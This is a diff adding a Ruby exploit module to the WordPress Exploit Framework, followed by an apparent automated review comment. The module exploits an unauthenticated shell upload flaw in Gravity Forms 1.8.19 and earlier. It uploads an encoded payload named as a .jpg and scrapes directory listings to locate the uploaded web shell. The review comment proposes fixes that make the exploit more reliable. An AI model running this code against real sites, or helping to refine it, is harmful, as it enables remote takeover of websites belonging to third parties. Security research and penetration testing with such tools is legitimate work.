| 1 | +class Wpxf::Exploit::GravityFormsV1819ShellUpload < Wpxf::Module |
| 2 | + include Wpxf::WordPress::ShellUpload |
| 3 | + |
| 4 | + def initialize |
| 5 | + super |
| 6 | + |
| 7 | + update_info( |
| 8 | + name: 'Gravity Forms <= 1.8.19 Unauthenticated Shell Upload', |
| 9 | + author: [ |
| 10 | + 'Sucuri.net', # Discovery and disclosure |
| 11 | + 'Rob Carr <rob[at]rastating.com>' # WPXF module |
| 12 | + ], |
| 13 | + references: [ |
| 14 | + ['WPVDB', '7820'] |
| 15 | + ], |
| 16 | + date: 'Dec 08 2014' |
| 17 | + ) |
| 18 | + |
| 19 | + register_option( |
| 20 | + IntegerOption.new( |
| 21 | + name: 'form_id', |
| 22 | + desc: 'A valid Gravity Forms form ID', |
| 23 | + default: 1, |
| 24 | + required: true |
| 25 | + ) |
| 26 | + ) |
| 27 | + end |
| 28 | + |
| 29 | + def check |
| 30 | + changelog = normalize_uri(wordpress_url_plugins, 'gravityforms', 'change_log.txt') |
| 31 | + check_version_from_custom_file(changelog, /Version\s+(\d+\.\d+(\.\d+)*)/, '1.8.20') |
| 32 | + end |
| 33 | + |
| 34 | + def form_id |
| 35 | + normalized_option_value('form_id') |
| 36 | + end |
| 37 | + |
| 38 | + def uploader_url |
| 39 | + full_uri |
| 40 | + end |
| 41 | + |
| 42 | + def upload_request_params |
| 43 | + { |
| 44 | + 'gf_page' => 'upload', |
| 45 | + 'form_id' => form_id |
| 46 | + } |
| 47 | + end |
| 48 | + |
| 49 | + def payload_body_builder |
| 50 | + builder = Utility::BodyBuilder.new |
| 51 | + builder.add_field('name', payload_name) |
| 52 | + builder.add_field('field_id', 1) |
| 53 | + builder.add_file_from_string('file', payload.encoded, "#{Utility::Text.rand_alpha(5)}.jpg") |
| 54 | + builder |
| 55 | + end |
| 56 | + |
| 57 | + def scrape_upload_folder |
| 58 | + emit_info 'Scraping target for the upload location...' |
| 59 | + uploads_url = normalize_uri(wordpress_url_uploads, 'gravity_forms') |
| 60 | + res = execute_get_request(url: uploads_url) |
| 61 | + |
| 62 | + unless res && res.code == 200 |
| 63 | + emit_error 'The target appears to have directory listing disabled' |
| 64 | + emit_error "Code: #{res.code}", true |
| 65 | + return nil |
| 66 | + end |
| 67 | + |
| 68 | + name = res.body[/href="(#{form_id}\-[a-z0-9\/]+?)"/i, 1] |
| 69 | + emit_success "Found directory: #{name}" |
| 70 | + name |
| 71 | + end |
| 72 | + |
| 73 | + def validate_upload_result |
| 74 | + return false unless upload_result && upload_result.code == 200 |
| 75 | + res = JSON.parse(upload_result.body) |
| 76 | + |
| 77 | + if res['status'] == 'error' |
| 78 | + emit_error "Upload failed: #{res['error']['message']}" |
| 79 | + return false |
| 80 | + end |
| 81 | + |
| 82 | + true |
| 83 | + end |
| 84 | + |
| 85 | + def uploaded_payload_location |
| 86 | + directory = scrape_upload_folder |
| 87 | + return false unless directory |
| 88 | + normalize_uri(wordpress_url_uploads, 'gravity_forms', directory, 'tmp', "_input_#{form_id}_#{payload_name}") |
| 89 | + end |
| 90 | +end |
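Review bot: The failure branch of scrape_upload_folder dereferences `res` right after allowing it to be nil: when the GET on the uploads directory returns no response at all (timeout, refused connection), `emit_error "Code: #{res.code}", true` raises NoMethodError instead of reporting the failure, so change it to `emit_error "Code: #{res ? res.code : 'no response'}", true`. validate_upload_result has the same shape of problem: `JSON.parse(upload_result.body)` is unguarded, so a 200 response whose body is not JSON (a WAF block page, a login redirect rendered as HTML) aborts the whole module with JSON::ParserError, and `res['error']['message']` assumes the error object always carries a message; wrapping the parse in `rescue JSON::ParserError` that returns false and reading `res.dig('error', 'message')` would make the check fail cleanly. Separately, uploaded_payload_location builds the temp file name as `_input_#{form_id}_#{payload_name}` while the multipart body hard-codes `field_id` to 1; if the target derives that name from the field id rather than the form id (which the default form_id of 1 would mask), any other form_id value would compute the wrong path, so this is worth confirming against the plugin's upload handler before relying on the option.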